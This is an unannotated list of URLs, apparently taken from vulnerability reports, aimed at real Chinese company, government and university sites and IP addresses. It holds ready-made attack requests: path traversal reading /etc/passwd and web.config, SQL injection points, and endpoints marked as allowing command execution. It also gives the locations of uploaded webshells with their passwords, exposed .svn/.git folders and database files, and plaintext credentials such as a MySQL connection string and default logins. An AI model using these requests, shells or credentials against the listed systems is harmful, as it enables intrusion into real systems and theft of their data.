http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://220.189.244.202:8080/kingdee/login/loginpage.jsp http://222.133.44.10:8080/kingdee/login/loginpage.jsp http://223.95.183.6:8080/kingdee/login/loginpage.jsp http://61.190.20.51/kingdee/login/loginpage.jsp http://60.194.110.187/kingdee/login/loginpage.jsp http://oa.roen.cn/kingdee/login/loginpage.jsp http://www.longlongweb.com/Resetpass/resetpass.shtml http://open.17wo.cn:8080/open17wo/ http://open.17wo.cn:8080/open17wo/manage/messageManagerloadMessage.action?id=96 http://www.baoxian.com/console/shop/order_config_new!buyNow.action?oldOrderSn=20140000004811&KID=aa39216c79772c909921f93edbdb0227&reInsureFlag=REIF&remethod=0&channelCode=01 http://www.baoxian.com/console/shop/order_config_new!buyNow.action?oldOrderSn=20140000004813&KID=aa39216c79772c909921f93edbdb0227&reInsureFlag=REIF&remethod=0&channelCode=01 http://www.baoxian.com/console/shop/order_config_new!buyNow.action?oldOrderSn=20140000004814&KID=aa39216c79772c909921f93edbdb0227&reInsureFlag=REIF&remethod=0&channelCode=01 http://www.baoxian.com/console/shop/order_config_new!buyNow.action?oldOrderSn=20140000004815&KID=aa39216c79772c909921f93edbdb0227&reInsureFlag=REIF&remethod=0&channelCode=01 http://www.baoxian.com/console/shop/order_config_new!buyNow.action?oldOrderSn=20140000004816&KID=aa39216c79772c909921f93edbdb0227&reInsureFlag=REIF&remethod=0&channelCode=01 http://203.156.212.202:8080/ http://www.95505.com.cn/b2a/saleNewCar/proposalView.do?id=0674636080720150000010 http://www.95505.com.cn/b2a/saleNewCar/proposalView.do?id=0674636080720150000013 http://www.95505.com.cn/b2a/saleNewCar/proposalView.do?id=0674636080720150000014 http://www.95505.com.cn/b2a/saleNewCar/proposalView.do?id=0674636080720150000015 http://www.95505.com.cn/b2a/saleNewCar/proposalView.do?id=0674636080720150000016 http://www.95505.com.cn/b2a/saleNewCar/proposalView.do?id=0674636080720150000017 http://api.m.uuzu.com/?account=e&c=api&device=android&event=recharge&game_id=93&m=select https://github.com/NoahShen/mycodefactory/blob/6a72c7f03be388c77c6fa10fa49b43c89c200d3d/dp-gitlab/src/dpgitlab/dpgitlab.go http://www.plgjj.com/webquery_login.asp http://js.crland.com.cn:80/project.aspx?pid=20&id=24&cpath=2&mid=4-0 ID:301865)密码110120 ID:100000) http://www.dai36.com/ https://mail.qq.com/ http://www.cqspbfy.gov.cn/ http://www.cqspbfy.gov.cn/webmis/login.asp http://211.162.209.186/files/4137000001CECF25/www.cqspbfy.gov.cn/web.rar http://www.xaks.com.cn:80/search.aspx http://www.xaks.com.cn/webCenter/ http://www.xaks.com.cn:80/search.aspx http://www.xaks.com.cn http://sqlmap.org http://www.fastontime.com/cgi-bin/ginfo.dll?WebPic&order=&w=fastontime* http://ask.huatu.com/question/questionbrowse.php?question_id=97224 http://www.chinaunicomsi.cn/cnc/cncsi.asp?id=%5c http://mail.hnedu.cn:8080/gw/admin/ http://new.citsbj.com http://new.citsbj.com/Personal/ContactDetail/XX(后面是id) http://new.citsbj.com ip:115.182.85.224 http://fotoplace.cc/api2/discover/discover_near_watermarks.php http://IP:7777/command?callback=xyz&...的形式本地或者远程获取手机的敏感信息、或者执行命令。 http://IP:7777/geo***?callback=xyz http://developer.baidu.com/wiki/index.php?title=docs/frontia tps://www.secoopay.com/invoker/JMXInvokerServlet system:type=ServerInf https://www.guangxindai.com/third/email_auth/82185/a9f1dfea8b13c08514c3c480759589e6/9ed279008f0c21ac7621dc1475075b6d/1438052747/71e09b16e21f7b6919bbfc43f6a5b2f0 https://www.guangxindai.com/third/email_auth/1/a9f1dfea8b13c08514c3c480759589e6/9ed279008f0c21ac7621dc1475075b6d/1438052747/71e09b16e21f7b6919bbfc43f6a5b2f0 http://www.wifiap.cn/ SSH:175.30.66.45 https://url/entsoft/LoginAction.entphone?leftFlag=true&method=logon&usrNam=admin&usrPswd=admin http://www.inins.com/Policy/Insure/InputPolicy/10000-241?update=true http://www.inins.com/Policy/Insure/InputPolicy/130000-241?update=true http://passport.ifreetalk.com/index.php?m=reset_pass&id=18197&u=ae6cabef0bc188dcbdd3754fd83a49be&e=def5ebc3d93bf178419778c23d6f2352 http://**.**.**.**//admin/Main.aspx http://**.**.**.**/admin/Main.aspx http://**.**.**.**//admin/Main.aspx http://**.**.**.**//admin/Main.aspx http://**.**.**.**//admin/Main.aspx http://**.**.**.**//admin/Main.aspx http://**.**.**.**//admin/Main.aspx http://bx.doyouhike.net/?act=show&pid=566715 http://bx.doyouhike.net/?act=show&pid=217825&key=89F47063AD4A http://www.ctmcc.cn/htworld/Login.asp http://realauto.testin.cn/ http://116.255.252.25:100 http://203.130.41.96/html/setting.html http://shop.vivo.com.cn/gallery-ajax_get_goods.html http://www.wy-fund.com/index.php?a=init&c=inbrok&inst_id=56&m=instarea http://www.wy-fund.com/index.php?c=infund&inst_code=80091787&m=instarea http://www.wy-fund.com/index.php?c=infund&inst_code=80091787&m=instarea http://sqlmap.org www.bdc.org.cn/common/download.do?path= http://www.999.com.cn/downpdffile.aspx?file=/../../web.config http://mgm.h-world.com/MGM/ForgetPassword http://plus.zealer.com/), http://www.zealer.com/user?type=info)(http://plus.zealer.com/user)的各项敏感操作均无防御CSRF(如增加token或验证referer)。 www.51suizhen.com http://pic0.aituan.com/public/images/at/act/.svn/entries svn://dev.aituan.com/aituan.com/public/images/at/act svn://dev.aituan.com/aituan.com svn://dev.aituan.com/aituan.com并且存在wangyupeng用户。 www.uunn.cn http://www.crcgas.net:80/exam/listScore.asp?id1=826&id2=827&id3=828&id5=830&nubb=5&tijiao=ok&id4=829-0 http://www.doyouhike.net:80/ www.doyouhike.net http://www.doyouhike.net:80/ www.doyouhike.net http://kjc.cuit.edu.cn/xxgcxy/ http://www.juran.cn/member/login.htm http://www.zteclouds.cn,中兴云服务: http://www.ttkdex.ca/control/taxRebateHandler.ashx post:customerNumber=1&Method=checkCNumber http://www.ttkdex.com.hk/control/taxRebateHandler.ashx post:customerNumber=1&Method=checkCNumber http://www.ttkexpress.us/control/taxRebateHandler.ashx post:customerNumber=1&Method=checkCNumber http://222.76.243.13:90/zhiji.asp http://222.76.243.13:90/System/FCKeditor/editor/fckeditor.html http://mail.ymt360.com/ http://m.elong.com/my/account/addresslist/ http://www.jxgb.gov.cn/searchqk.asp http://www.jxgb.gov.cn/login.asp http://www.doyouhike.net:80/ www.doyouhike.net http://www.doyouhike.net:80/ www.doyouhike.net http://gplm.zhxg.com/api/excel.php?path=../../../../../../../../../../etc/passwd http://app4.vpclub.cn http://app.vpclub.cn/ http://dev.vpclub.cn:84/ http://120.24.218.210:8081/ http://211.99.198.14/ http://test.admin.f.sdo.com/ http://m.zc.suning.com/order/toBuy.htm?redoundId=5108&projectId=1428 www.edaixi.com http://119.29.44.145/ http://www.tootoojia.com/userAddress/AddAddress.htm?CityId=2&UserId=100001&DetailedAddress=wooyuntest&ProvinceId=1&DistrictId=10&RealName=%E5%93%88%E5%93%88&PhoneNumber=13888888888&Postcode=100000 http://www.tootoojia.com/userAddress/ShowAddressList.htm?UserId=104853 www.tootoojia.com/notice/noticeList.htm?Page=1&PageSize=20&UserId= www.tootoojia.com/mail/GetMailUserList.htm?Page=1&PageSize=20&UserId= www.tootoojia.com/friend/AddFriend.htm?FollowId=参数1&UserId=参数2 http://www.tootoojia.com/Contact/ShowContactList?UserId=100000 URL:http://www.chnkid.com/wxfw/toupiao/perinfo_show.php?id=8561&share=1&from=groupmessage&isappinstalled=0 http://www.sdwscgs.com:9080/zdwz/xwl.do?smid=02&bgid=01&bj=10参数smid和bgid均可注入 http://oa.haotel.com/index.htm http://jsgz.cn/eg.htm http://mofang.hunantv.com/ me:7002(与费控系统为统一访问地址) smb://samba.dev.elenet.me/ http://z.elenet.me/zap.pac http://z.elenet.me/zapsocks.pac http://zz.elenet.me http://zz.elenet.me/ofsocks.pac https://passport.coolyun.com/forget/ http://rd.haierpeople.cn/Home/Main http://mmsynut.shengyuan.com/crmselfservicedemo/printglbill.asp?mid=167983 http://60.13.180.2:7001/wscxhami/zfbzgl/zfbzsq/login_hidden.jsp?password=111111&sfzh=11111111&cxyd=%B5%B1%C7%B0%C4%EA%B6%C8 www.fjmotor.com.cn/tBook/magazine.asp?mCode=20150105104750086 www.xl-group.com.cn/tBook/Magazine.asp?mCode=20130109121105875 http://www.hengyugroup.com.cn/tbook/Magazine.asp?mCode=20121217173403886 www.jianzhou.cn/tBook/Magazine.asp?mCode=20150413150438653 hy.txwl.cn/tBook/magazine.asp?mCode=20140325141903118 www.zhongliangroup.cn/TBook/Magazine.asp?mCode=2014_274 zgwy.txwl.cn/tbook/Magazine.asp?mCode=2012062085408653 http://pay.360kxr.com/PromptOrder/OrderPay?orderid=1210507 http://pay.360kxr.com/PromptOrder/OrderPay?orderid=1212971 http://www.968309.com/news.php?act=list&cat_id=36 http://browser-admin.server.nubia.cn http://eb.e-bridge.com.cn/newebridge/default.jsp http://123.125.116.75:80 http://www.800best.com/manage/asp/temp.asp获取shell。 http://lianjie.crland.com.hk/Webs/HR/news.aspx?hr=69 http://lianjie.cr land.com.hk/Webs/HR/news.aspx http://sqlmap.org http://lianjie.crland.com.hk:80/Webs/HR/index.aspx http://sso.testin.cn/ucenter.action?op=Password.retakePwd http://182.139.134.85:6001/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=1 http://wooyun.org/bugs/wooyun-2015-0129261 http://www.chinartc.com:80/dev/homeinfoman/getOneNewsInfo.do?newsId=20150603135533616 http://zx.caakee.com/servlet/download?fileName=caakee_importAccount.xls zx.caakee.com/servlet/download?fileName=../../../../../../../../../../etc/hosts http://112.65.166.115/messager/users.data http://**.**.**.**/ggj/news/listNews.jsp?channel=null&artColumn=03020205&startRow=1220&rowNum=10 http://**.**.**.**/news/listNews.jsp?channel=null&artColumn=03020105&rowNum=15 http://**.**.**.**/hsgs/news/listNews.jsp?channel=1&artColumn=03020101 http://**.**.**.**/news/listNews.jsp?channel=5&artColumn=030207 http://**.**.**.**/opac/book_evaluation.jsp?kzh=zyk0044456&flh=H310.421/6&fs=1 http://**.**.**.**:8089/opac/book_evaluation.jsp?kzh=zyk0067864&flh=I565.64/4&fs=1 http://**.**.**.**:8089/opac/book_evaluation.jsp?kzh=zyk0021839&flh=A1/1-1&fs=1 http://**.**.**.**:8090/opac/book_evaluation.jsp?kzh=zyk0005042&flh=A71/3&fs=1 http://**.**.**.**:8000/opac/book_evaluation.jsp?kzh=zyk0000001&flh=F744/12&fs=1 http://219.143.192.32/ http://bbs.duowan.com/ http://sso.sys.kuxun.cn/.git/config http://www.tczfgjj.gov.cn/contact.aspx?sortId=30 http://www.imxiaomai.com/Join/index/id/20.html http://www.homsom.com/information/Info_ModifyAddress.aspx?Aid=3662 http://www.homsom.com/information/Info_ModifyName.aspx?cfid=12666 http://61.156.217.133:2011/index.htm user:cccc pwd:111111 http://61.156.217.133:2011/goform/webDown/?name=user_obj.txt&path=/etc/passwd http://shop.100msh.com http://www.hbstars.com/Default.shtml http://www.hbstars.com/news/visitread.aspx?ID=12001504150000 http://city.vivo.com.cn/mb/CheckAll.aspx?actiontype=1&pageindex=2&t=0.7262028979603201&typeid=468 http://city.vivo.com.cn/pc/CheckAll.aspx?actiontype=1&pageindex=2&t=0.4454611742403358 http://city.vivo.com.cn/mb/CheckAll.aspx?actiontype=MoreUpload&t=0.7064304086379707 http://headpic.u.qiniudn.com/13邮9511箱022@qq.com?e=1438588987&token=OOHK9_MIwdSJxAHYi5os2taDVS13CVvcEa1cZDb9:8SAF5GENL6scaR2R43YfUKhLR8w= http://www.lrts.me/delComment.do?commentId=4442620 http://101.231.65.81/ http://180.166.180.81/ http://221.226.149.17:8080/kingdee/control/netcom_out_del.jsp?del_id=1,1* http://222.133.44.10:8080/kingdee/control/netcom_out_rfile_submit.jsp?netcom_id=1&index_id=1 http://222.133.44.10:8080/kingdee/control/netcom_out_submit.jsp?netcom_key=1&index_id=1 http://221.226.149.17:8080/kingdee/control/netcom_out_rfile_lower_submit.jsp?index_id=1&action=1111 http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://122.139.60.103:800/kingdee/login/loginpage.jsp http://oa.guanhao.com:8080/kingdee/login/loginpage.jsp http://222.179.238.182:8082/kingdee/login/loginpage2.jsp http://222.134.77.23:8080/kingdee/login/loginpage.jsp http://221.4.245.218:8080/kingdee/login/loginpage.jsp http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://220.189.244.202:8080/kingdee/login/loginpage.jsp http://222.133.44.10:8080/kingdee/login/loginpage.jsp http://223.95.183.6:8080/kingdee/login/loginpage.jsp http://61.190.20.51/kingdee/login/loginpage.jsp http://60.194.110.187/kingdee/login/loginpage.jsp http://oa.roen.cn/kingdee/login/loginpage.jsp http://218.27.137.242:8080 http://222.177.213.190:8888 http://117.132.15.88:8001 http://221.224.116.210:81 http://221.238.243.237:8000 http://222.177.213.190:8888/Server/CmxcheckBind.php?b=2&a=1%cc http://203.192.12.219/Default.aspx http://211.138.77.214/ http://211.138.77.214/XWZX/XWZXDetail.aspx?PKID=1935 http://member-center.pywm.com.cn/ http://113.98.59.170 http://221.6.35.202:8193/ http://221.6.35.202:8193/is/index.jsp http://server2.cdce.cn/WebEims/ http://123.233.240.70:9080/ksbm/checkjx.do?xzqh=370125 http://123.233.240.70:9080/ksbm/checkjx.do?type=bm&code=3701036 http://223.99.198.194:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://218.56.165.82/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://222.134.129.34:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://222.134.200.57:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://60.213.185.51:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://60.211.179.22:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://123.130.246.26:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://cgs.ytjj.gov.cn:9061/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://123.131.131.94:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://218.59.228.162:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://cgs.qdpolice.gov.cn:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://58.59.39.43:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://www.njds.gov.cn/cgi-bin/test-cgi http://www.heinz.com.cn/ http://www.doyouhike.net/user/1/photos?set_id=78834&set_name=5M http://www.doyouhike.net/user/1/photos?set_id=78834&set_name=5M http://www.ahljj.gov.cn/e:/ http://easyxiu.zol.com.cn/H/repair_ajax.php?point=u&noid=1&mark=296&txt=%E8%8B%B9%E6%9E%9C&lei=%E5%B9%B3%E6%9D%BF%E7%94%B5%E8%84%91&fin=false&num=1 http://imccc2012.hit.edu.cn/main.jsp http://imccc2012.hit.edu.cn/login.jsp index.php/admin/ http://ices.hit.edu.cn:8080/ http://ices.hit.edu.cn:8080/test3693/ http://ices.hit.edu.cn:8080/manager/html http://findpwd.veigou.com/ http://media.open.com.cn/media_file002/1109/dongshi/guojif/anli.asp?id=160 http://passport2.chaoxing.com/admin http://60.190.87.218/index.php?g=Home&m=Index&a=login http://jpkc.hfut.edu.cn/2007/szlj/memberInfo.php?id=1 ftp://211.144.85.198/ ftp://211.144.85.198/Web.config www.jet185.com http://222.73.41.20:8080 http://222.73.41.20:8011 http://222.73.41.20:8085 http://222.73.41.20:8087 http://www.4haigou.com http://acc.netcansoft.com http://cash.netcansoft.com http://222.73.41.20:8014 http://222.73.41.20:7044 http://222.73.41.20:9099 http://www.yhhaitao.com http://oa.netcansoft.com http://ship.netcansoft.com http://222.73.41.20:8086 http://222.73.41.20:8001 http://222.73.41.20:8075 http://222.73.41.20:8099 http://222.73.41.20:8012 http://222.73.41.20:8888 http://222.73.41.20:8282 http://wechat.netcansoft.com http://222.73.41.20:1213 http://222.73.41.20:8077 http://222.73.41.20:1212 http://222.73.41.20:8056 http://www.netcansoft.com www.jet185.com http://eduadminnew.open.com.cn/Public/ http://eduadminnew.open.com.cn/upload/ http://eduadminnew.open.com.cn/upload/BillMode/Temp/ http://eduadminnew.open.com.cn/upload/BillMode/ http://eduadmin.open.com.cn/ http://eduadmin.open.com.cn/BasicSystem/include/properties/configure.xml http://eduadmin.open.com.cn/include/properties/Configure.xml http://eduadmin.open.com.cn/BasicSystem/Query/ http://eduadmin.open.com.cn/BasicSystem/Query/TeacherQuery.aspx http://www.xtepkids.com.cn/admin.php http://www.xtep.com/admin.php http://www.xtop.cc/admin.php http://www.testin.cn/portal.action?op=Portal.index http://wap.smetj.gov.cn/secondeTop.action?type=230_10_gknb&priv_prefix=zfxx http://www.968309.com/news.php?act=list&cat_id=1 http://www.968309.com/sunshineDoctor.php?page=%40%402eb2B&standard_dept_id=2 http://61.140.131.131:8000/kyt/main/login.action http://218.77.75.158:8080/system/manager/terminalLogin.do http://www.cxtuku.com/phpma/ https://119.167.245.100 http://www.hspcn.net/home/productpro/?SEARCH_KEYWORD=aaa http://e.pptv.com/toro/login;jsessionid=52676FCA566BB6D7B9EDF563A4A7CB51?# http://e.pptv.com http://www.lhpa.gov.cn/js_news_xg.asp?news_id=9711 http://www.lhpa.gov.cn http://211.99.198.13 http://211.99.198.13/.svn/entries http://www.dca.org.cn/chubanwu?id=9&fenlei=联盟介绍&fid=179&zfenlei=活动计划&zid=238 http://supports.house.sina.com.cn/decor/photolib/getonephoto_200808.php?id=6740&type=room http://www.pingliang.gov.cn/ https://ebusiness.pkufi.com/siteadmin/login.aspx https://www.shandianjr.com/sdmall/detail?itemId=8a2b5b7d4e8d302c014e8da3bf7500ae http://www.miliyo.com/login账号输入处,可多次输入错误的账号密码,都未有图片验证码以及IP锁定策略。 http://ndsjc.imu.edu.cn/admini/login.php http://www.imuemba.com/emba_backstage/Login.asp http://gfs.imu.edu.cn/Database/ http://gfs.imu.edu.cn/Database/SiteWeaver.mdb http://res.ks.91.com/mgt/content/subjectmanage/subjectlist.aspx http://res.ks.91.com/mgt/content/books/hotkeywordslist.aspx http://www.feiren.com http://www.feiren.com/flight/pay.php?orderid=201206280942041253 http://www.feiren.com/flight/pay.php?orderid=201207082153411032 http://www.feiren.com/flight/pay.php?orderid=201206241125571178 http://www.doyouhike.net/s/route/?city_slug=&from=result&keyword=&page=1&route_type_id=10&tag_id= http://m.zol.com.cn/feixin.php?id=129&title=1&view_type=1 http://wljg.xags.gov.cn//wzxx.do?catagoryid=351&flag=6&method=enterIndex&parentid=350 http://mapi.miliyo.com/login/i_login?isMiui=1&_ua=*)处多次输入错误的账号密码,都未有图片验证码以及IP锁定策略。 http://oa.hx.cn/login.action http://www.qdbofcom.gov.cn:8080/qdeng/qingdaocity/1201.htm http://www.wxzte.com.cn/manage/adminlogin.aspx Injection:hongyan.cqupt.edu.cn/szzc/history2/article.php?id=373 http://cx.xmedu.cn/jszp/QueryScoreLogin.action http://fphyd.chinaccd.net/index.php http://www.ahrcu.com/upload/download.jsp?path=&fileName=download.jsp&name= http://61.243.45.250/eg.htm http://61.243.45.250/setsys_backup.htm www.cofcofeedhh.com/cont_showing.php?type_id=112&up_id=&id=122&look_tag=1 http://www.kfpolice.com/WEB/jgdt/index.aspx?id=104 http://124.89.70.198:85/KeyWordInfo.aspx http://**.**.**.**/Login.aspx http://**.**.**.** http://www.zcqh.com/admin/login.php http://www.hspcn.net/home/news/?SEARCH_KEYWORD=x http://www.hspcn.net/home/supply/?SEARCH_KEYWORD=x http://www.scppa.gov.cn/search/index.jsp?keyword=1&clom=doctitle http://www.scppa.gov.cn/ht/FCKeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=File&CurrentFolder= http://www.hspcn.net/home/supply/?AREA_ID=120000%27&pagesize=10&sidx=&sord=&SEARCH_KEYWORD= http://gjsf.jpkc.zstu.edu.cn/ http://gjsf.jpkc.zstu.edu.cn/admin/main.asp http://www.bydauto.com.cn/app/byd.html http://gps2.gps188.com/gps/doif/myLogin.jsp www.b2bys.com http://www.sdcp.cn/打开下图中的标志 http://minix.soso.com/php/front.php/software/software_c/get_software_list/* http://minix.soso.com/php/front.php/software/software_c/get_software_list/7-false http://minix.soso.com/php/front.php/software/software_c/get_software_list/7 http://minix.soso.com/php/front.php/software/software_c/get_software_list/7-true http://minix.soso.com/php/front.php/software/software_c/get_software_list/6 http://218.28.136.20:8000/bus/ http://218.28.136.20:8000/bus/result.jsp?Area=%D6%A3%D6%DD&Name=12&Type=3&page=1 http://fotoplace.cc/admin/src/post/postlist.php?a=36058664 http://124.127.113.235/employee/employee!login.action http://124.127.113.235/qwe.jsp jdbc:mysql://10.43.32.13:3306/timesheet?user=etimesheet&password=qiche@123 http://video.cust.edu.cn/page/mainPage.php?id=0000000134 Injection:video.cust.edu.cn/page/mainPage.php?id=0000000134 ftp://112.4.74.93/ ftp://112.4.74.93/web.config ftp://112.4.74.93/20150624-sz-dump/ ftp://112.4.74.93/A03 http://club.bydauto.com.cn/home.php?uid=411379 http://www.pds12319.gov.cn/portal!resume.action?sign=lxwm存在命令执行漏洞 http://www.pds12319.gov.cn/1.jsp密码123 http://mall.ecitic.com/ URL:http://www.ccsa.org.cn/bpggs/gs_content.php?id=19 http://**.**.**.**/ http://domain:port/Common/HRManage/UserList.aspx?Retire=0&Code= http://**.**.**.**/bugs/wooyun-2010-076859 http://**.**.**.**/bugs/wooyun-2010-094014 http://**.**.**.**/weboa/Common/HRManage/UserList.aspx?Retire=0&Code= http://**.**.**.**/Common/HRManage/UserList.aspx?Retire=0&Code= http://**.**.**.**:8090/Common/HRManage/UserList.aspx?Retire=0&Code= http://**.**.**.**:8080/Common/HRManage/UserList.aspx?Retire=0&Code= http://**.**.**.**/Common/HRManage/UserList.aspx?Retire=0&Code= http://**.**.**.**:8080/Common/HRManage/UserList.aspx?Retire=0&Code= http://**.**.**.**:81/Common/HRManage/UserList.aspx?Retire=0&Code= http://**.**.**.**:8080/Common/HRManage/UserList.aspx?Retire=0&Code= http://**.**.**.**/Common/HRManage/UserList.aspx?Retire=0&Code= http://**.**.**.**:8080/Common/HRManage/UserList.aspx?Retire=0&Code= http://**.**.**.**:81//Common/HRManage/UserList.aspx?Retire=0&Code= http://**.**.**.**:8080/Common/HRManage/UserList.aspx?Retire=0&Code= http://wenku.baidu.com/view/f16aed9adaef5ef7ba0d3ca7.html http://182.92.234.7/Admin/user/Login http://www.waic.gov.cn/readfile.asp?id=52 http://www.waic.gov.cn/readfile.asp?id=57 http://sqlmap.org http://119.254.70.177/lianjia/login/login http://119.254.70.177/lianjia//upload/image/20150729/20150729170930_in.jsp jdbc:oracle:thin:@10.**.0.105:1521:YQ http://www.fang360.com/的入口网址,内网可以登陆多个站点 http://se.homelink.com.cn/SalesMgr-Web/login.jsp http://eoffice.homelink.com.cn/login/Login.jsp?logintype=1&gopage=/homepage/Homepage.jsp?hpid=462&subCompanyId=1&isfromhp=1&isfromportal=0 http://ehr.homelink.com.cn/psp/HR91PRD/?cmd=login&languageCd=ZHS&(已登录系统,默认密码test/123456,可查询公司花名册(包含各个员工的信息),薪资以及公共资源配置,已得到左晖董事长的联系方式) gdjyoa.com/sys/sys_login!login.action http://training.transn.com/ctat_v2/index.php http://www.100ehome.com/member/orderDetail2.asp?Flag=1&OrderID=28000 http://jyoa.tju.edu.cn/logon.do http://hyt.mama100.com/hyt/ http://lyg9999.huway.com/user_jyxq?from=actorder&orderid=19003 http://ox.51credit.com/ pwd:adservice/feifei http://s.wanxue.cn/findpw1.do http://127.0.0.1/damicms/del_bom.php?dir= inurl:http://zkcjcx.jxeea.cn/zkcj/ http://zkcjcx.jxeea.cn/zkcj/?txbticket=016708203615&txbname=%E4%BD%95%E6%B3%A2&txbvalidatecode=&ddlprofessionlist=5efc0f142ebc4e078331b13dea5a6cbe&hiddenchangeschool=&hiddenchangeprofession=5efc0f142ebc4e078331b13dea5a6cbe http://zkcjcx.jxeea.cn/zkcj/?txbticket=014110300639&txbname=%E8%B0%A2%E8%89%AF%E5%A8%9F&txbvalidatecode=&ddlprofessionlist=a1a93b29385143bc953fa4e6c0240f7b&hiddenchangeschool=&hiddenchangeprofession=a1a93b29385143bc953fa4e6c0240f7b http://fw.popedu.net/zl28/index2.php?dx_id=2814 http://fw.popedu.net/zl28/index2.php?dx_id=2814 http://sqlmap.org http://202.101.116.85:8090 http://union.58.com/ ftp://ftp.cootek.cn:35595 ftp://build.58corp.com/hudson/dianshangwuxian/dianshangwuxian-jiazhengmanager_4-2-30_BRANCH/1 http://build.58corp.com/job/dianshangwuxian-58daojia-ipa/ http://svn.58corp.com/dianshangwuxian/tags/jzt/ios/ http://svn.58corp.com/dianshangwuxian/tags/jzt/ios/ http://svn.58corp.com/dianshangwuxian/tags/jzt/ios/ http://build.58corp.com/view/58到家/view/58到家-Android-测试/ http://svn.58corp.com/cgi-bin/svn.cgi http://cmxy.gzmu.edu.cn/Stu_article.php?id=3591 http://shop.vivo.com.cn/gallery-ajax_get_goods.html http://www.tensin.cn/include/trade.jsp?orderId=61612 http://61.55.148.217/WeiXinServer/m.jsp http://**.**.**.** http://**.**.**.**/custom-hong.html http://**.**.**.**:8080/ParentReg.aspx http://**.**.**.**:8080/ParentReg.aspx http://**.**.**.**:8080/ParentReg.aspx http://**.**.**.**:8080/ParentReg.aspx http://**.**.**.**:8080/ParentReg.aspx http://**.**.**.**:8080/ParentReg.aspx http://**.**.**.**:81/ParentReg.aspx http://**.**.**.**/ParentReg.aspx http://**.**.**.**/ParentReg.aspx http://**.**.**.**:8080/ParentReg.aspx http://**.**.**.**:8080/ParentReg.aspx http://**.**.**.**:8080/ParentReg.aspx http://**.**.**.**:8080/ParentReg.aspx http://**.**.**.**:8080/ParentReg.aspx http://res.ec.cn/check/mms/publish.jsp?act=viewcontent&mmsid=1599368353195133 http://222.172.223.247:8080/knowledge_yn/query/query!queryPublic.action存在命令执行漏洞 http://119.188.112.183:22228/gtsd_track/track.action存在命令执行漏洞 http://www.huaweimossel.com/user.php?act=findpwd http://www.huaweimossel.com/user.php?act=passwordphone http://www.huaweimossel.com/user.php?act=retpasswordphone http://www.huaweimossel.com/user.php?act=retpasswordphone http://hbmy.agridoor.com.cn/Hbmy/search/myjc_seach_list.action?pageno=2&pagesize=15存在命令执行漏洞 http://airportmft.xaeport.com/MsgPull/msgpull/msgpull-query!ctbillPassQuery.action存在命令执行漏洞 club.caakee.com/index.php?app=group&p=2&gid=5&act=topic&tid=21599&mod=Topic http://www.szsjrfw.com/link.action存在命令执行漏洞 http://my.55bbs.com/lostpasswd/ http://www.dltwsj.com/index.php?option=com_wrapper&view=wrapper&Itemid=299 cisco:cisco http://newsletter.sinica.edu.tw Injection:newsletter.sinica.edu.tw/news/read_news.php?nid=392(需要绕过WAF/IDS/IPS) http://ocs.quyiyuan.com/login.jsp http://www2.shmtu.edu.cn/cct/newsView-new.asp?id=1071 www2.shmtu.edu.cn/cct/newsView-new.asp?id=1071 http://oa.thothinfo.com/Login.aspx http://oa.thothinfo.com/Main.aspx?rf=Workflows/DemandTreatment/DemandTreatmentApply.aspx?wtit_id=c227a8dd-6a37-4713-8e2d-3b8db844abc6&wtin_id=2e0219ef-d102-482b-ab64-b4a4ab4d2936&wti_id=1e89a811-3187-496c-a503-e2e9d2f49f24 http://oa.thothinfo.com/file/150730093422373.aspx http://oa.thothinfo.com/UserInfo.aspx,发现是当前用户的信息 http://www.10jqka.com.cn/modules/Surveys/get_graph.php?vid=1 http://www.10jqka.com.cn/ad_mar/test.htm http://csdf.muzhiwan.com/.svn/entries http://**.**.**/CabinetMgmt/ExPressUserListpageIndex=31_ http://**.**.**/CabinetMgmt/ExpressUserList_ http://**.**.**/CabinetMgmt/NoGetOrderListpageIndex=1&TimeStatus=2_ http://**.**.**/CabinetMgmt/OrderInfo http://**.**.** http://www.fjsmjj.com/jkyy1/User_ShowXx.aspx?id=83 http://www.fjsmjj.com/jkyy1/manager/Default.aspx http://mail.airchinacargo.com http://wan.sogou.com/p/index.do http://shopping.bcia.com.cn/app/eshop/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fissue%2500.jpg/single/id/133 http://www.csljc.com/manage/login.aspx www.csljc.com http://my.1ting.com/fav/folder http://szy.baojisl.gov.cn/ http://szy.baojisl.gov.cn/install/ab.php http://gsxt.scaic.gov.cn:8080/xxsb/login.do?method=printLlybab_new&nbxh=5107000050060030 http://gsxt.scaic.gov.cn:8080/xxsb/login.do?method=printLlybab_new&nbxh=5107000050060031 http://gsxt.scaic.gov.cn:8080/xxsb/login.do?method=printLlybab_new&nbxh=5107000050060035 http://gsxt.scaic.gov.cn:8080/xxsb/login.do?method=printLlybab_new&nbxh=5107000050060037 http://gsxt.scaic.gov.cn:8080/xxsb/login.do?method=printLlybab_new&nbxh=5107000050060039 http://gsxt.scaic.gov.cn:8080/xxsb/login.do?method=printLlybab_new&nbxh=5107000050060040 http://gsxt.scaic.gov.cn:8080/xxsb/login.do?method=printLlybab_new&nbxh=5107000050060041 http://gsxt.scaic.gov.cn:8080/xxsb/login.do?method=printLlybab_new&nbxh=5115000000004786 http://weixin.hazq.com/ http://weixin.hazq.com/analysis/yyblist.php?yyb=82 http://weixin.hazq.com/phpmyadmin/ http://weixin.hazq.com/darkmoon3.php http://zjc.sicnu.edu.cn/solicit_2014_sys/solicit2014_infor_enrollment.aspx http://zjc.sicnu.edu.cn http://210.39.18.247/graph_view.php?action=tree&tree_id=6 http://amway.hiall.com.cn/1.php http://61.135.231.203:8001/ http://61.135.231.203:7001/jmxroot/jmxroot.jsp http://221.6.35.202/login.html 